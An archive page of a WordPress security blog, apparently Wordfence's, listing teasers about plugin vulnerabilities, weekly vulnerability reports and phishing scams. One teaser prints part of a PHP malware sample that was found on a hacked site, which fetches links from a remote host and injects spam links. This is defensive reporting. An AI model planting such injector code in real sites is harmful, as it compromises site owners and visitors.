Archive For: WordPress Security
-
August 1, 2023
Categories:
-
On June 8, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in WebToffee’s Stripe Payment Plugin for WooCommerce plugin, which is actively installed on more than 10,000 WordPress websites. This vulnerability makes it possible for an attacker to gain access to the accounts of users... Read More
-
July 28, 2023
Categories:
-
Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this... Read More
-
July 28, 2023
Categories:
-
Earlier this week we became aware that malicious actors are using Wordfence brand image to run a phishing scam on WordPress and Wordfence users, posing as unknown login notifications from their own website while linking to a fake login page, clearly aiming to steal WordPress login credentials. If you have received a suspicious email like... Read More
-
July 27, 2023
Categories:
-
Last week, there were 62 vulnerabilities disclosed in 1035 WordPress Plugins and 90 WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 36 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with... Read More
-
July 26, 2023
Categories:
-
Website owners and developers tend to buy a lot of domains. With different projects on the go and working with multiple different clients at any given time it can be a challenge to keep track of all your inventory. Sadly, when old websites and domains get forgotten about they can be preyed upon by attackers... Read More
-
July 25, 2023
Categories:
-
Even the most diligent site owners should consider when they had their last website security check. As our own research indicates, infections resulting from known website vulnerabilities continue to plague website owners. According to our 2022 Hacked Website Report, last year alone WordPress accounted for 96.2% of infected websites due to its market share and... Read More
-
July 20, 2023
Categories:
-
We’ve all received spam and phishing emails — our inboxes are often full of them. They let us know that our package is being delivered (even when we haven’t ordered anything), provide details on our “recent” tax filing (that was completed months ago), and encourage us to act fast and enter our credit card —... Read More
-
July 20, 2023
Categories:
-
Note: We accidentally sent out an email for this report with last weeks subject line. Due to the subject line not being very different week to week for this report, we opted to just leave it as is and not send a follow-up email. We apologize for this error on our part! Last week, there... Read More
-
July 18, 2023
Categories:
-
This investigation started with a small and quite simple piece of PHP malware found on a hacked website. We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file: <?php $lines = file(‘https://4ip[.]su/db/links.txt’); shuffle($lines); $data = array_rand($lines, 900); echo ‘<p>’; foreach($data as $value) { $rand = substr(md5(microtime()),rand(0,26),6); echo ‘<a href=”‘.$lines[$value].'”>’.$rand.'</a> ‘;... Read More
-
July 18, 2023
Categories:
-
“Never Assume Anything” – that is the 4th Guiding Principle written in the Security section of the WordPress Common APIs Handbook for developers. When it comes to WordPress plugin security, assumptions can be dangerous. This became evident when the Wordfence Threat Intelligence team discovered an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in 14 different email... Read More
«
1
…
16
17
18
19
20
…
103
»
Tap To Call